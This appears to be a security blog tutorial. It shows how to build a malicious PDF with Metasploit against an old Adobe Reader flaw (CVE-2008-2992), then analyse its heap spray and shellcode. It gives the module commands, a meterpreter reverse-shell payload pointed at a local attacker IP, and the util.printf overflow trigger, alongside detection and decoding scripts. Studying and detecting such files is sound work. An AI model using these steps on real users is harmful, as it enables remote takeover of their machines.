Infected PDFs have long been a favored way to compromise users, because this document format is very common and used by almost everyone. Moreover, there are many ways to exploit Acrobat Reader vulnerabilities, and it is a very stealthy and elegant way to launch malware.
In this article, I will show you how easy it is to craft a malicious PDF with custom shellcode and trigger a vulnerability to execute a payload. We will also analyse the malicious PDF to learn how the payload is stored and how to extract it. This article is for research purposes only, don’t do bad things!
What is a PDF? Format Analysis
PDF is an object-oriented format defined by Adobe. It describes how a document is organized and preserves the dependencies the document needs (fonts, images, …). These objects are stored within the document as streams, most of the time encoded or compressed. Below is an overview of a classic PDF document. For more information, please read Adobe’s specifications.
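To make the object and stream layout more concrete, here is a minimal Python sketch that lists the objects of a PDF and inflates the streams that declare the FlateDecode filter. It is an illustration only: the function name list_objects is my own, the regular expressions are a simplification that ignores object streams, incremental updates and other filters, and a real parser should be preferred for serious work.

```python
import re
import zlib

# "N G obj ... endobj"; a simplification, not a full PDF parser.
OBJ_RE = re.compile(rb"(\d+)\s+(\d+)\s+obj\b(.*?)endobj", re.DOTALL)
STREAM_RE = re.compile(rb"stream\r?\n(.*?)\r?\n?endstream", re.DOTALL)


def list_objects(pdf_bytes):
    """Return {object_number: (dictionary_bytes, stream_bytes_or_None)}."""
    objects = {}
    for match in OBJ_RE.finditer(pdf_bytes):
        number = int(match.group(1))
        body = match.group(3)
        stream = None
        found = STREAM_RE.search(body)
        if found:
            stream = found.group(1)
            header = body[:found.start()]
            if b"/FlateDecode" in header:
                try:
                    # decompressobj tolerates trailing bytes after the data
                    stream = zlib.decompressobj().decompress(stream)
                except zlib.error:
                    pass  # keep the raw bytes if inflation fails
            body = header
        objects[number] = (body.strip(), stream)
    return objects
```

Calling list_objects(open("malicious.pdf", "rb").read()) gives a dictionary keyed by object number, which is enough to browse a small file like the one built later in this article.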
Metasploit: Infected PDF creation
We will create a fake PDF with Metasploit, containing an exploit attempt as well as a custom payload (the code to execute). The exploit targets a specific version of Adobe Reader, so we will need to do some archaeology and find an ancient Reader version (thanks to http://www.oldapps.com/) to install on the target machine.
So, first, let’s make this PDF. We will make an infected PDF that just opens the calculator (calc.exe) on the machine, for demonstration only. Open a Metasploit console (installing Metasploit is not covered in this article) and type:
use exploit/windows/fileformat/adobe_utilprintf
set FILENAME malicious.pdf
set PAYLOAD windows/exec
set CMD calc.exe
show options
exploit
The output should look like this:
Copy the file that has just been created (here /home/osboxes/.msf4/local/malicious.pdf) to a shared drive. You will need to feed it to your target machine.
Execution of the Infected PDF
On the target machine, download and install a vulnerable Adobe Reader version (Metasploit tells us it should be 8.1.2 or earlier). I chose to install version 8.1.1. Once it is installed, open the malicious.pdf file. You should see a calculator being spawned from the Adobe Reader process. That’s the exploit.
I made another PDF with a slightly different payload, just for fun:
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.29
set LPORT 4455
Here’s the result. Adobe Reader now hosts a backdoor (a reverse shell) waiting for commands.
PDF Stream Dumper: Infected PDF Analysis
Enough playing! Let’s see what’s inside that malicious PDF and try to extract the malicious payload (we’re still working with the calc.exe PDF). First, we will need a tool called PDF Stream Dumper, so download it. Load the malicious PDF with it, and take some time to familiarize yourself with the tool.
We can start by checking whether the tool detects an exploit, using the « Exploit Scan » menu:
Exploit CVE-2008-2992 Date:11.4.08 v8.1.2 - util.printf - found in stream: 6
Indeed, there’s an exploit hidden in stream 6 (the one in blue on the capture). But let’s start from the beginning: when searching for exploits in a PDF, most of the time we encounter a heap spray created by JavaScript code. That heap spray is used to push the payload onto the heap, ready to be executed once the vulnerability has been triggered. If you open stream 1, you can see:
/Type/Catalog/Outlines 2 0 R/Pages 3 0 R/OpenAction 5 0 R
This translates to: the OpenAction is in stream 5. Let’s move to stream 5:
/Type/Action/S/JavaScript/JS 6 0 R
This tells Reader to execute the JavaScript located in stream 6. That stream shows plain JavaScript, so it’s time to open the « Javascript_UI » menu. We immediately recognize a big hex-encoded string, pushed into a variable for the heap spray. This is our payload:
Fortunately, we have tools to manipulate it and understand what it does. Select the payload (the part between quotes), and open the « Shellcode_analysis » menu. Then choose « scDbg – LibEmu Emulation ». You will get a new window with the shellcode decoded into bytes (you can even save it to a file):
LibEmu is a library able to simulate a processor; it gives information about what the assembly code is trying to do. Just hit the « Launch » button and you will understand:
Here it is: we can clearly see that the shellcode just opens a calc.exe window and exits.
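The chain followed by hand above (catalog, then action, then JavaScript stream) can also be traced with a few lines of Python. This is a rough sketch under several assumptions: the helper name trace_open_action is hypothetical, the references are assumed to be indirect ones of the form "N G R" as in this sample, and inline actions or object streams are not handled.

```python
import re

OBJ_RE = re.compile(rb"(\d+)\s+\d+\s+obj\b(.*?)endobj", re.DOTALL)
OPEN_ACTION_RE = re.compile(rb"/OpenAction\s+(\d+)\s+\d+\s+R")
JS_RE = re.compile(rb"/JS\s+(\d+)\s+\d+\s+R")


def trace_open_action(pdf_bytes):
    """Follow Catalog -> /OpenAction -> /JS and return the object numbers."""
    bodies = {int(m.group(1)): m.group(2) for m in OBJ_RE.finditer(pdf_bytes)}
    for number, body in bodies.items():
        if b"/Catalog" not in body:
            continue
        action = OPEN_ACTION_RE.search(body)
        if not action:
            continue
        action_no = int(action.group(1))
        # The action object should point at the object holding the script.
        script = JS_RE.search(bodies.get(action_no, b""))
        script_no = int(script.group(1)) if script else None
        return {"catalog": number, "action": action_no, "javascript": script_no}
    return None  # no catalog with an indirect /OpenAction was found
```

On a file laid out like this one, the result names objects 1, 5 and 6, which matches what PDF Stream Dumper shows.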
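If you prefer to do the decoding step yourself, the conversion from the quoted string to raw bytes is short. The sketch below assumes the payload is written as JavaScript %uXXXX escapes (the form unescape() expects); that is my assumption about this sample, and the function name unescape_to_bytes is made up for the example. A string encoded differently would need a different decoder.

```python
import re
import struct

PERCENT_U = re.compile(r"%u([0-9a-fA-F]{4})")


def unescape_to_bytes(text):
    """Convert a '%uXXXX...' string into the bytes it represents in memory."""
    words = PERCENT_U.findall(text)
    # Each %uXXXX is one 16-bit code unit, stored little-endian on x86,
    # so %u41eb becomes the byte 0xeb followed by the byte 0x41.
    return b"".join(struct.pack("<H", int(word, 16)) for word in words)
```

For instance, unescape_to_bytes("%u9090%u41eb").hex() returns "9090eb41". The resulting bytes can be written to a file and handed to scDbg or a disassembler.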
Let’s redo the same analysis for the other malicious PDF (reverse shell):
Self-explanatory, right? The shellcode loads the library needed to manipulate sockets (ws2_32.dll) and tries to connect back to the C&C. I haven’t talked about the exploit itself yet: it’s located at the end of the JavaScript code (as stated by the exploit scan, « util.printf – found in stream: 6 »). It exploits a buffer overflow in the util.printf function to execute arbitrary code (here, our heap-sprayed shellcode).
util.printf("%45000.45000f", 0);
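A call like this one is easy to spot once the JavaScript has been extracted. As a rough triage aid, here is a Python sketch that flags util.printf calls whose floating-point format has an abnormally large width or precision. The function name and the threshold of 1000 are arbitrary choices of mine, and obfuscated scripts (string concatenation, eval and so on) would slip past such a simple pattern.

```python
import re

# util.printf("%<width>.<precision>f", ...) written in plain text.
PRINTF_RE = re.compile(r"util\.printf\(\s*[\"']%(\d+)\.(\d+)f")
THRESHOLD = 1000  # hypothetical cutoff, not taken from any specification


def find_suspicious_printf(javascript, threshold=THRESHOLD):
    """Return (offset, width, precision) for each oversized format found."""
    hits = []
    for match in PRINTF_RE.finditer(javascript):
        width, precision = int(match.group(1)), int(match.group(2))
        if width >= threshold or precision >= threshold:
            hits.append((match.start(), width, precision))
    return hits
```

Run on the script from stream 6, it should report the 45000.45000 format shown above, while an ordinary call such as util.printf("%5.2f", 1.5) is ignored.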
Links
– http://www.sans.org/reading-room/whitepapers/malicious/owned-malicious-pdf-analysis-33443
– http://www.oldapps.com/adobe_reader.php
– http://contagiodump.blogspot.fr/2010/08/malicious-documents-archive-for.html
– http://contagiodump.blogspot.fr/2013/03/16800-clean-and-11960-malicious-files.html
– http://eternal-todo.com/blog/cve-2011-2462-exploit-analysis-peepdf
– http://resources.infosecinstitute.com/analyzing-malicious-pdf/